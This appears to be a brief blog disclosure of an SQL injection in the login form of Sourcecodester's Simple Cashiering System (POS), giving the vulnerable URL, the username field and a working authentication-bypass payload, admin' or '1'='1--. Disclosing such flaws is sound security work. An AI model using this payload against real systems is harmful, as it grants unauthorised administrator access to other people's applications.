Sourcecodester Simple Cashiering System (POS) unauthenticated SQLi allows authentication bypass with admin privileges
Looking for vulnerabilities in some project in Sourcecodester I found the Simple Cashiering System (POS) so I put my enviroment ready to hunt bugs and the first one that I found was an SQLi in the login form that allows authentication bypass as admin.
vulnerable URL: http://localhost/cashiering/login.php
affected fielt: username
payload: admin' or '1'='1--
notice that is necessary to put something as password(it can be any char)
Comentarios
Publicar un comentario